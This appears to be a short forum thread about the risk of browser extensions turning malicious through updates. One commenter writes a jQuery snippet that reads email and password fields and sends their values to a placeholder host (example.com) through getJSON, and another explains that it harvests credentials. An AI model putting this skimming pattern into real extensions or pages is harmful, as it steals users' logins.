4 ms·
I am more concern with the overconfidence of some user over their extensions/updates; a extension with many users can suddenly include something like: $('.
by jQueryIsAwesome 15y ago
I am more concern with the overconfidence of some user over their extensions/updates; a extension with many users can suddenly include something like:
$('.email, input[type=password]').val(send_to_database)
- JohnQPasserby 15y agowhy would the attacker setting the password field be a problem
- jQueryIsAwesome 15y agofunction send_to_database(val){ $.getJSON('http://example.com/data.json',{data: val},function(){}) return val }
- deleted 15y ago[deleted]
- nitrogen 15y agoThat looks like it retrieves the value of any element with the class name of .email and any password input (i.e. harvesting e-mail addresses and passwords). http://api.jquery.com/val/#val2 http://api.jquery.com/val/#val2
- catshirt 15y agofair enough, but i'm not sure i'd agree. it's much easier to detect a malicious extension than to detect a page you are about to visit is going to exploit the negligence of one of the extensions. firstly, the extension source is available meaning it's open to review and criticism. more so, the concern here is even if i am careful about the extensions i install, i am still vulnerable.
- deleted 15y ago[deleted]